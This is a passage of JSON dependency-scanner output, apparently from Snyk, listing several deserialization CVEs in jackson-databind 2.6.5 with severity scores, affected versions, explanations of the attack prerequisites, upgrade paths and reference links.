"com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": "https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, 